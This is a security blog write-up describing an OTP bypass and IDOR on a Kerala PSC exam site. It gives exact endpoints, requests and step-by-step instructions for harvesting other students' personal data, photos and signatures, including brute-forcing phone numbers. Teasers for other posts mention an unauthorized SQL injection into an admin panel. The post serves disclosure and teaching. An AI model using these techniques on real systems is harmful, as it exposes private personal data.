Awww!!! It's *Public* Service Commission.....

-
In this post, I'd like to talk about multiple issues I found on a website owned by Kerala Public Service Commission. The issues here are otp bypass to achieve IDOR. For those who don't know what's IDOR, quoting from OWASP "Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly".

 The site url is `https://mailer.psc.kerala.gov.in/KPSCAptitudeTest/home`, which is a temporary site they've opened for the Aptitude Exam for engineering students.



How the site works

Students can register for the aptitude exam by providing following details : College ID card number, Mobile Number, Email, Name, Address, College Name, Desired Center Name and the photographs of themself, signature and id card.

Question : This is for engineering students. What I'm doing there?

We're everywhere. In this case, One of my friend is an engineering student and she asked me to register her details because she doesn't have the laptop with her. I said ok and that's why I visited this site.

I registered using her details and few days later, the registration closed and it's time to download the hall ticket. I visited the site. The registration form is there but is disabled. Only phone number and college Id card number fields are active now. And it asks us to enter phone number, then it will sent the otp and if it's success, it will fill all the details automatically and also we can download the hall ticket from there. While registering, I didn't think of testing the site and also this is not for me. So I didn't tried any xss payloads or anything else on the site.

Now let's come to the points.

I gave my phone number but didn't get any otp and this continued 4-5 times. I decided to bypass this.

Bug 1: Most simple bug


I entered the mobile number and college ID card and checked the download hall ticket button. But it's disabled.

I opened chrome devtools, element inspector, navigated to the download button and removed attribute disabled. Now I clicked the download button and boom!! the hall ticket was successfully downloaded. Remember that the field that asks the otp is still there and I didn't got any otp.

Bug 2: Another Simple Bug


Here, I tried another method. Without entering id card number, I simply entered the mobile number and click on send otp. Then in the otp field, I entered random number and clicked verify. It sends the following request

POST /KPSCAptitudeTest/index.php/Mock_Controller/verifyOTP_download_hallticket HTTP/1.1
Host: mailer.psc.kerala.gov.in

cand_mob={mobile_number}&otp_entered={otp_I_entered}&csrf_token_online_mock={some_md5_value}

And the response looked like

200 OK

{"message": "The OTP you have entered is incorrect!!", "status":false}

I intercepted the response and edited the response json value to

{"status":true}

And yeah. It worked. It then filled all data in the form and the download hall ticket button, then enabled.

Bug 3 : IDOR to access other user's data

Then, I entered the phone number of my friend by assuming that she had registered for it. Bypassed the otp verification and thank god, she registered for the exam. This time, I kept an eye on all the requests it sends and here're the observations.

1. To get student details

Once the otp verification is successful, it then sends the following request first
POST /KPSCAptitudeTest/index.php/Mock_Controller/get_cand_details_hallticket HTTP/1.1
Host: mailer.psc.kerala.gov.in

mob_no={mobile_number}&csrf_token_onlinemock={csrf_token}

and the server responds

{"0": {"cand_cd":"{some_id}", "cand_id":"{college_id_number}","cand_name":"{name_of_student}","cand_dob":"{dob}","cand_address":"{address_of_student}","cand_email":"{email}","cand_mobile":"{mobile_numer}","clg_name":"{college_name}","cand_idcard_path":"{relative_url_to_photo_of_idcard}","cand_exam_venue_opted":"{id_of_exam_center}"},"details": [{"cand_cd":"{some_id}", "cand_id":"{college_id_number}","cand_name":"{name_of_student}","cand_dob":"{dob}","cand_address":"{address_of_student}","cand_email":"{email}","cand_mobile":"{mobile_numer}","clg_name":"{college_name}","cand_idcard_path":"{relative_url_to_photo_of_idcard}","cand_exam_venue_opted":"{id_of_exam_center}"}],"status":true}

This includes the details

A. DOB
B. Email
C. Address
D. Link to photo of ID card


In this request, server doesn't check anything to verify the mobile number in request. That means we can alter the mobile number and if it is a registered one, we can get these details.

2. To get the photos

a. To get photo of student, it sends the following request

POST /KPSCAptitudeTest/index.php/Mock_Controller/get_cand_photo_download HTTP/1.1
Host: mailer.psc.kerala.gov.in

mob_no={mobile_number}&csrf_token_onlinemock={csrf_token}

and the response is the base64 decoded image of student.

b. To get photo of signature, it sends another request

POST /KPSCAptitudeTest/index.php/Mock_Controller/get_cand_sign_download HTTP/1.1
Host: mailer.psc.kerala.gov.in

mob_no={mobile_number}&csrf_token_onlinemock={csrf_token}

and the response is base64 decoded image of signature.

3. To get hall ticket download link

To get the link to download hall ticket, it sends the following request

POST /KPSCAptitudeTest/index.php/Mock_Controller/download_hallticket HTTP/1.1

 Host: mailer.psc.kerala.gov.in

 mob_no={mobile_number}&cand_id={idcard_number}&csrf_token_onlinemock={csrf_token}

and it returns a base64 encoded value, when decoded, shows the following

report=header&type=pdf&cand_idcard_no={idcard_number}&cand_mob={mobile}

4. To download hall ticket

After getting the above base64 encoded response, it then sends another request

GET /KPSCAptitudeTest/application/reportengine.php?arg={base64_encoded_data} HTTP/1.1

and the response of above request is a pdf file.


Summary

Prerequsite : Student's mobile number (or) we can bruteforce it.

How to carry attack

Send the request in #3.1 to get the following details

a. name
b. id card number
c. email
d. college
e. dob
f. photo of id card
g. address
etc.

If you need the hall ticket, encode the following to base64 

report=header&type=pdf&cand_idcard_no={idcard_number}&cand_mob={mobile}

and send it to the endpoint mentioned in #3.4 to download the hall ticket.

To get photo and signature , send the requests mentioned in #3.2.a and #3.2.b

There is no rate-limit present and the csrf-token is not single-use-only. This action can be automated to get the details of list of phone numbers or this can also be bruteforced


Actions taken from my side

- Contacted PSC about this.

- Mailed them about this.

- Commented on their posts on facebook.

-> No response from them.

The exam was on 9th March and now they've taken the site down.

Comments

  1. AnonymousMarch 25, 2019 at 4:18 AM

    Can you teach me how to Do such ethical Hacking Things? �� I am a complete noob but has some knowledge of C++

    ReplyDelete

Post a Comment

Popular posts from this blog

Taking over Facebook Page Tabs

-
Image
In this post, I'm describing how I was able to take over 4 tabs on Facebook's own Pages. 1. Facebook India Ambassadors I was browsing Facebook as usual and not in a mood to test anything. I then visited Facebook India's page to check is there any update from Facebook India and that's when I noticed a page tab Facebook India Ambassadors . I clicked on it to see Facebook India's Brand Ambassadors and the tab showed a heroku error page. I was surprised to see that there. It looked interesting to me so I decided to dig further. I found out that it loads a third party website in an iframe in main section. The url was  http://immense-atoll-4159.herokuapp.com/  and I visited the url directly to verify that the subdomain doesn't exist. Heroku shows a does not exist error page if the subdomain doesn't exist. So I logged into my Heroku account and created a new project and give immense-atoll-4159  as project id. Then I created a simple NodeJS Script for
Read more

How I could've accessed personal details of tens of thousands of people

-
Image
This is a security issue I found in one of the company that work in different fields. They make different type of electronic equipments as well as offers the public an easy way to enroll and avail benefits of different Govt Schemes. Let's say the company name is XYZ and the domain is xyz.com. They provide people a way to enroll to various govt services with their service centres, like a govt agency and public can register/ apply for any kind of govt services, schemes, etc. They're also an authorized service provider of a Govt Scheme by a state govt. I was checking the functionalities in their website and noticed a login url under  /admin . I visited /admin/login.php  and saw a Login page. I tried 5-10 different user:pass combinations and none of them worked. I then decided to try sqli in the login form. Like most of the PHP sites created by noooobs, this site is also vulnerable to sqli in login form. I got access to the admin panel, I saw scanned copies of ID c
Read more

Send request to Martians. Earthlings are already your friends.

-
Image
Hello everyone, I'm back with another write up. This time it's a Google bug. YouTube is Google's video sharing site and a great place to explore. As a bug hunter, you can spend hours or days or even weeks in YouTube without hesitation. I always used YouTube to play some music when I worked as a developer last year. When I started bug hunting, I tried YouTube multiple times and can't find any. Then I started hunting on another google services. After hunting for more than 2 hours, I found a bug on one of Google's acquisition. According to  Google , a video PoC is required only if it is contributing something that the text can't. But I'm a great fan of videos and my first bug to google (duplicate) contained a 15min video 😎. I recorded a video of that bug I found and visited YouTube to upload it. when I clicked upload button, I noticed something strange aside it, something new. It looked like a message button. But then, the upload page has loaded
Read more